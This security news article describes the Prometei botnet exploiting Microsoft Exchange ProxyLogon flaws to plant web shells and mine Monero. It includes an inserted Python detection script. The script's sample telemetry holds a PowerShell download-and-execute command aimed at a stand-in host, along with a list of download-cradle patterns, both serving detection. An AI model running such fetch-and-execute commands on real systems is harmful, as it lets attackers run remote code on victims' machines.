Prometei Botnet Exploiting Unpatched Microsoft Exchange Servers

Attackers are exploiting the ProxyLogon Microsoft Exchange Server flaws to co-opt vulnerable machines to a cryptocurrency botnet named Prometei, according to new research.

“Prometei exploits the recently disclosed Microsoft Exchange vulnerabilities associated with the HAFNIUM attacks to penetrate the network for malware deployment, credential harvesting and more,” Boston-based cybersecurity firm Cybereason said in an analysis summarizing its findings.

First documented by Cisco Talos in July 2020, Prometei is a multi-modular botnet, with the actor behind the operation employing a wide range of specially-crafted tools and known exploits such as EternalBlue and BlueKeep to harvest credentials, laterally propagate across the network and “maximize the number of systems participating in its Monero-mining pool.”

“Prometei has both Windows-based and Linux-Unix based versions, and it adjusts its payload based on the detected operating system, on the targeted infected machines when spreading across the network,” Cybereason senior threat researcher Lior Rochberger said, adding it is “built to interact with four different command-and-control (C2) servers which strengthens the botnet’s infrastructure and maintains continuous communications, making it more resistant to takedowns.”

The intrusions take advantage of the recently patched vulnerabilities in Microsoft Exchange Servers with the goal of abusing the processing power of the Windows systems to mine Monero.

In the attack chain observed by the company, the adversary was found exploiting Exchange server flaws CVE-2021-27065 and CVE-2021-26858 as an initial compromise vector to install the China Chopper web shell and gain backdoor entry to the network. With this access in place, the threat actor launched PowerShell to download the initial Prometei payload from a remote server.
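The two-step chain described above (a web shell written to the Exchange server, then PowerShell fetching the payload) maps onto two host-level detections a defender can run over endpoint telemetry: the IIS worker process (w3wp.exe, which hosts Exchange) writing a server-side script file, and a command shell or PowerShell launched from that worker with a download cradle on its command line. The Python below is an added example and is not code from Cybereason or from the original article; the Sysmon-like event dictionaries, the download-cradle keyword list and the sample events are all constructed assumptions rather than published Prometei indicators.

```python
"""Constructed detection example for the Exchange web shell -> PowerShell download chain.

Event records use a simplified, Sysmon-like shape (assumed):
  ProcessCreate: Id, EventType, ParentImage, Image, CommandLine
  FileCreate:    Id, EventType, Image, TargetFilename
"""
import re

# IIS worker processes host Exchange's web front end (OWA/ECP).
IIS_WORKERS = {"w3wp.exe"}
# Interactive shells that a web shell typically uses to run operator commands.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Server-side script extensions a web shell would be dropped as.
SERVER_SCRIPT_EXTS = (".aspx", ".ashx", ".asmx")

# Generic PowerShell download-cradle fragments (assumed list, not Prometei-specific).
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
    r"start-bitstransfer|net\.webclient|certutil.*-urlcache)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: dict) -> list:
    """Flag IIS worker -> shell spawns and PowerShell download cradles."""
    findings = []
    parent = basename(ev.get("ParentImage", ""))
    image = basename(ev.get("Image", ""))
    cmdline = ev.get("CommandLine", "")
    if parent in IIS_WORKERS and image in SHELLS:
        findings.append("iis_worker_spawned_shell")
    if image in POWERSHELL and DOWNLOAD_CRADLE.search(cmdline):
        findings.append("powershell_download_cradle")
    return findings


def check_file(ev: dict) -> list:
    """Flag the IIS worker itself writing a server-side script (web shell drop)."""
    image = basename(ev.get("Image", ""))
    target = ev.get("TargetFilename", "").lower()
    if image in IIS_WORKERS and target.endswith(SERVER_SCRIPT_EXTS):
        return ["iis_worker_wrote_server_script"]
    return []


def scan(events) -> list:
    """Return (event id, detection tag) pairs for every event that matches."""
    alerts = []
    for ev in events:
        if ev.get("EventType") == "ProcessCreate":
            tags = check_process(ev)
        elif ev.get("EventType") == "FileCreate":
            tags = check_file(ev)
        else:
            tags = []
        alerts.extend((ev["Id"], tag) for tag in tags)
    return alerts


# Constructed sample telemetry: events 1-3 model the observed chain, 4-5 are benign.
SAMPLE_EVENTS = [
    {"Id": 1, "EventType": "FileCreate", "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "TargetFilename": r"C:\inetpub\wwwroot\aspnet_client\constructed_example.aspx"},
    {"Id": 2, "EventType": "ProcessCreate", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c powershell -nop -w hidden"},
    {"Id": 3, "EventType": "ProcessCreate", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/stage1')\""},
    {"Id": 4, "EventType": "ProcessCreate", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"Id": 5, "EventType": "FileCreate", "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\Documents\report.xlsx"},
]

if __name__ == "__main__":
    for event_id, tag in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {tag}")
```

Both rules are deliberately independent of any particular web shell name or download URL, so they also catch variations on the chain; the file-write rule in particular is cheap and rarely fires on a healthy Exchange server, which makes it a good first triage signal after a ProxyLogon exposure window.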

Recent versions of the bot module come with backdoor capabilities that support an extensive set of commands, including an additional module called “Microsoft Exchange Defender” that masquerades as a legitimate Microsoft product and likely takes care of removing other competing web shells that may be installed on the machine, so that Prometei gets access to the resources needed to mine cryptocurrency effectively.

Interestingly, newly unearthed evidence gathered from VirusTotal artifacts has revealed that the botnet may have been around as early as May 2016, implying that the malware has continuously been evolving ever since, adding new modules and techniques to its capabilities.

Prometei has been observed in a multitude of victims spanning across the finance, insurance, retail, manufacturing, utilities, travel, and construction sectors, compromising networks of entities located in the U.S., U.K., and several countries in Europe, South America, and East Asia, while also explicitly avoiding infecting targets in former Soviet bloc countries.

Not much is known about the attackers other than the fact that they are Russian speaking, with older versions of Prometei having their language code set as “Russian.” A separate Tor client module used to communicate with a Tor C2 server included a configuration file that is configured to avoid using several exit nodes located in Russia, Ukraine, Belarus, and Kazakhstan.

“Threat actors in the cybercrime community continue to adopt APT-like techniques and improve the efficiency of their operations,” Rochberger said. “As observed in the recent Prometei attacks, the threat actors rode the wave of the recently discovered Microsoft Exchange vulnerabilities and exploited them in order to penetrate targeted networks.”

“This threat poses a great risk for organizations, because the attackers have absolute control over the infected machines, and if they wish so, they can steal information, infect the endpoints with other malware or even collaborate with ransomware gangs by selling the access to the infected endpoints,” she added.